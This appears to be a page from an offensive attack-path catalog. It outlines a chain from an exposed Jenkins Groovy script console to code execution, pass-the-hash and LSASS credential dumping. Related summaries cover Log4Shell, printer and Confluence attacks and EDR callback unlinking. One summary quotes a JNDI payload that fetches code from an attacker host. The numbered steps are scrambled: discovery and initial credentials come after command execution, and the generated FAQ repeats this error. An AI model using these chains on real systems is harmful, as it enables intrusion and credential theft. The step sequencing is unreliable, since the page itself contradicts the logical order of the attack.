Jenkins /script Groovy console → RCE → AD
Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.
§ Context
Assumed environment: foothold inside the corporate network. Jenkins master reachable. Default admin credentials, anonymous read access, or a known exploitable user.
§ Steps
- 01Run system commands as Jenkins userExecutionT1059— Command and Scripting Interpreter
- 02Move laterally with harvested credsLateral MovementT1550.002— Pass the Hash
- 03Default / leaked admin credentialsCredential AccessW-AUTH-DEFAULT— Default Credentials
- 04Open /script Groovy consoleExecutionCI-PIPELINE-RCE— Jenkins Script Console RCE
- 05Discover Jenkins UIDiscoveryN-NMAP-INTERNAL— Internal Nmap Sweep
- 06Dump cached AD creds from agentsCredential AccessW-LSASS-PROCDUMP— LSASS via procdump / comsvcs.dll
§ References
- T1059Command and Scripting Interpreter
- T1550.002Pass the Hash
§ Frequently asked
- What is the "Jenkins /script Groovy console → RCE → AD" attack path?
- Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Run system commands as Jenkins user (T1059) — a execution primitive. Assumed environment: foothold inside the corporate network.
- What is the final impact of this kill-chain?
- The final step lands on Dump cached AD creds from agents (W-LSASS-PROCDUMP), which falls under Credential Access. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques3
EternalBlue (MS17-010) → SMBv1 wormable spread
Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- Shared techniques3
Unpatched Confluence (CVE-2023-22515) → internal foothold
Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.
- Shared techniques3
Reconfigure MFP LDAP → harvest service-account credentials
Walk up to / network-into the MFP admin web panel (default creds), change the LDAP address-book server to attacker IP — printer immediately re-binds and sends its service-account creds in cleartext.
- Shared techniques2
BYOVD → kernel-level disable of EDR callbacks
From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- Shared techniques2
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- Shared techniques2
PJL / PostScript → printer root → quiet network foothold
PRET-style payloads against TCP/9100 give RCE on the printer's controller. The printer is a stable, EDR-free Linux box trusted by the rest of the network — perfect long-term implant.